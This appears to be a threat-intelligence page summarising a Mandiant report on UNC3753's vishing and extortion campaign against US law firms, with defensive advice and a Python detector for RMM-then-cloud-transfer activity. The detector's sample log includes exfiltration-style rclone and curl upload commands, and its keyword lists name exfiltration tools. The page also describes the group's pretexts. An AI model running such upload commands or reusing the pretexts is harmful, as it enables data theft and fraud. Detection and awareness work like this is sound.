UNC3753 Targets US Law Firms in Sophisticated Vishing Campaign
Severity: High (Score: 67.5)
Sources: cloud.google.com, Mandiant
Summary
From January to May 2026, Mandiant identified a financially motivated data theft extortion campaign by the threat cluster UNC3753, targeting US law firms and financial services firms. The group uses voice phishing (vishing) and social engineering to obtain remote access to corporate environments: attackers pose as internal IT support and use pretexts such as a data migration to talk employees into starting screen-sharing sessions. They then locate and exfiltrate sensitive data, including legal agreements and personally identifiable information (PII), and use it to back extortion demands. Attacks are executed rapidly, often completed within a single business day. Some incidents involved physical access to corporate offices by individuals masquerading as IT technicians. The group sends benign-looking invoice-themed emails to establish a pretext before following up by phone. The campaign has affected dozens of organizations across the professional, legal and financial services sectors.

Key Points:
• UNC3753 employs vishing and social engineering to target US law firms.
• Data theft and extortion typically involve sensitive legal and financial information.
• The entire attack sequence can occur within a single business day.
Detailed Analysis
**Impact**
Dozens of organizations across the professional, legal and financial services sectors in the United States were targeted from January through May 2026. The campaign resulted in the theft of highly sensitive data, including proprietary legal agreements, PII and financial records, which were then used to back extortion demands. Attacks were often completed within a single business day, with data searches and exfiltration taking under an hour once the actor had a session. Physical access attempts, in which individuals impersonating IT technicians tried to copy data to USB storage media, were also reported.

**Technical Details**
Initial access was obtained through vishing combined with social engineering. Invoice-themed email lures sent from actor-controlled consumer email accounts established the pretext; the threat actors then impersonated internal IT or security personnel and called employees at all seniority levels, talking them into starting a screen-sharing session or installing a remote monitoring and management (RMM) tool such as AnyDesk, Bomgar, Zoho Assist or SuperOps RMM. Screen-sharing and remote-session tools observed included Zoom, Microsoft Teams, Quick Assist and Microsoft Terminal Services (RDP). No CVEs or specific malware hashes were disclosed; the intrusions relied on legitimate remote-access tooling and user cooperation rather than exploitation. The related-entity list below also names file-transfer tools (Rclone, WinSCP, curl) and cloud storage services (Google Drive, OneDrive), consistent with the T1567 Exfiltration Over Web Service mapping. The attack lifecycle covered reconnaissance, initial access, execution, persistence, data collection and exfiltration, often completed within hours.

**Recommended Response**
Train users to recognize vishing and to verify any unsolicited IT support request through an independent channel (a call back to the published help-desk number, or a ticket in the firm's own system) before installing software or starting a screen-sharing session. Restrict remote access to an approved, centrally deployed tool, block or alert on the installation and execution of other RMM clients and on unexpected Quick Assist or Terminal Services sessions, and require multi-factor authentication for all remote sessions. Monitor for file-transfer utilities such as Rclone, WinSCP and curl running shortly after a remote-access session, and restrict USB storage to limit physical exfiltration. Require visiting technicians to be verified with the IT department before they are given access to offices or workstations.
Deploy network and endpoint detection rules to identify anomalous remote access activity and screen-sharing sessions initiated outside normal operational procedures.
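The monitoring advice above, as an added detection example that is not part of the Mandiant report or this page's sources: it correlates RMM tool launches from unmanaged paths with file-transfer tools pointed at cloud storage on the same host within an hour, running over constructed Sysmon-style process-creation events. The tool name patterns, the managed-install directories, the 60-minute window, and all hostnames, users, paths and URLs in the sample are assumptions.

```python
"""Correlate RMM-tool launches with follow-on cloud transfers on one host.

Added example for the response guidance above; not code from Mandiant or
this page's sources. Input is constructed JSON-lines text shaped like Sysmon
Event ID 1 (UtcTime, Host, User, Image, ParentImage, CommandLine). The tool
name patterns, managed-install directories and 60-minute window are
assumptions chosen for the example.
"""
import json
from datetime import datetime, timedelta

# Substrings of executable names for the RMM and screen-sharing tools the
# report names (AnyDesk, Bomgar, Zoho Assist, SuperOps RMM, Quick Assist).
RMM_KEYWORDS = ("anydesk", "bomgar", "zoho", "superops", "quickassist")
# Transfer tools from the entity list; one of them running minutes after an
# RMM session is the pattern to catch.
TRANSFER_IMAGES = {"rclone.exe", "winscp.exe", "curl.exe"}
# Command-line fragments pointing at cloud storage or an rclone remote
# (T1567, Exfiltration Over Web Service).
CLOUD_HINTS = ("drive.google.com", "onedrive", "1drv.ms", "googleapis.com", "remote:")
# Where an IT-managed RMM agent would live (assumption); anything else is user-installed.
MANAGED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")
# Mandiant saw search and exfiltration finish in under an hour.
WINDOW = timedelta(minutes=60)

# Constructed sample events; hosts, users, paths and URLs are invented.
SAMPLE_LOG = r"""
{"UtcTime": "2026-03-04 14:02:10", "Host": "WS-LAW-07", "User": "FIRM\\jdoe", "Image": "C:\\Users\\jdoe\\Downloads\\AnyDesk.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "AnyDesk.exe"}
{"UtcTime": "2026-03-04 14:05:42", "Host": "WS-LAW-07", "User": "FIRM\\jdoe", "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"}
{"UtcTime": "2026-03-04 14:41:33", "Host": "WS-LAW-07", "User": "FIRM\\jdoe", "Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\rclone.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "rclone.exe copy D:\\Matters remote:matters --transfers 8"}
{"UtcTime": "2026-03-04 09:00:05", "Host": "WS-IT-01", "User": "FIRM\\svc_rmm", "Image": "C:\\Program Files\\AnyDesk\\AnyDesk.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "AnyDesk.exe --service"}
{"UtcTime": "2026-03-05 11:15:00", "Host": "WS-LAW-12", "User": "FIRM\\asmith", "Image": "C:\\Windows\\System32\\curl.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "curl.exe -T C:\\Matters\\agreement.pdf https://drive.google.com/upload"}
"""


def parse_events(text):
    """Parse JSON-lines text into event dicts, sorted by parsed UTC time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        event["time"] = datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S")
        events.append(event)
    return sorted(events, key=lambda e: e["time"])


def image_name(path):
    """Lower-cased executable name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return 'rmm', 'transfer' or None for one process-creation event."""
    name = image_name(event["Image"])
    if any(keyword in name for keyword in RMM_KEYWORDS):
        return "rmm"
    if name in TRANSFER_IMAGES:
        return "transfer"
    return None


def is_managed_install(path):
    """True when the image sits under a directory IT deploys to."""
    return path.lower().startswith(MANAGED_DIRS)


def mentions_cloud(command_line):
    """True when the command line names a cloud destination or rclone remote."""
    lowered = command_line.lower()
    return any(hint in lowered for hint in CLOUD_HINTS)


def detect(text):
    """Run the correlation over JSON-lines events and return alert dicts."""
    alerts = []
    last_rmm = {}  # host -> time of the most recent RMM launch on that host
    for event in parse_events(text):
        kind = classify(event)
        host = event["Host"]
        if kind == "rmm":
            last_rmm[host] = event["time"]
            if not is_managed_install(event["Image"]):
                alerts.append({"rule": "rmm_unmanaged_path", "severity": "medium",
                               "host": host, "user": event["User"], "image": event["Image"]})
        elif kind == "transfer" and mentions_cloud(event["CommandLine"]):
            started = last_rmm.get(host)
            if started is not None and event["time"] - started <= WINDOW:
                gap = int((event["time"] - started).total_seconds() // 60)
                alerts.append({"rule": "rmm_then_cloud_transfer", "severity": "high",
                               "host": host, "user": event["User"], "image": event["Image"],
                               "minutes_after_rmm": gap})
            else:
                alerts.append({"rule": "cloud_transfer_tool", "severity": "low",
                               "host": host, "user": event["User"], "image": event["Image"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(json.dumps(alert))
```

On the sample, the IT-deployed AnyDesk under Program Files is recorded as a session start but raises nothing; the user-downloaded AnyDesk raises a medium alert, the rclone run 39 minutes later on the same host raises a high one, and a lone curl upload on a host with no preceding RMM launch raises a low one. In a real deployment the events would come from the SIEM rather than an inline string, the managed directories and RMM keywords would be replaced with the firm's approved tool and install path, and the window would be tuned to observed dwell times.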
Source articles (2)
- Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms — Mandiant · 2026-06-05
From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," "Chatty Spider," and "Sile…
- Targeted Campaign Us Law Firms — cloud.google.com · 2026-06-05
Timeline
- 2026-01-01 — Start of the campaign window: Mandiant tracked UNC3753 data theft extortion activity against US law firms and financial services firms from January through May 2026 (the date marks the beginning of that window, not a specific incident).
- 2026-05-31 — Rapid attack execution observed: Mandiant noted that an intrusion can run from the initial phone call to data theft within a single business day, with data search and exfiltration taking under an hour.
- 2026-05-31 — Physical access incidents reported: Threat actors entered corporate offices posing as IT technicians to copy data directly to USB storage media.
Related entities
- Chatty Spider (APT Group)
- Luna Moth (Ransomware Group)
- Silent Ransom Group (Ransomware Group)
- UNC3753 (Threat Cluster)
- Data Breach (Attack Type)
- Phishing (Attack Type)
- United States (Country)
- business-data-leaks.com (Domain)
- helpdesk.com (Domain)
- it.com (Domain)
- itdesk.com (Domain)
- privnote.com (Domain)
- Financial (Industry)
- Legal (Industry)
- Professional Services (Industry)
- T1021 - Remote Services (Mitre Attack)
- T1059 - Command and Scripting Interpreter (Mitre Attack)
- T1204 - User Execution (Mitre Attack)
- T1566 - Phishing (Mitre Attack)
- T1567 - Exfiltration Over Web Service (Mitre Attack)
- Citrix (Company)
- Windows (Platform)
- Windows 365 (Platform)
- Bomgar (Platform)
- Zoom (Platform)
- AnyDesk (Tool)
- curl (Tool)
- Google Drive (Tool)
- iManage (Tool)
- Microsoft Teams (Tool)
- Microsoft Terminal Services (Tool)
- OneDrive (Tool)
- Privnote (Tool)
- Quick Assist (Tool)
- Rclone (Tool)
- WinSCP (Tool)
- Zoho Assist (Tool)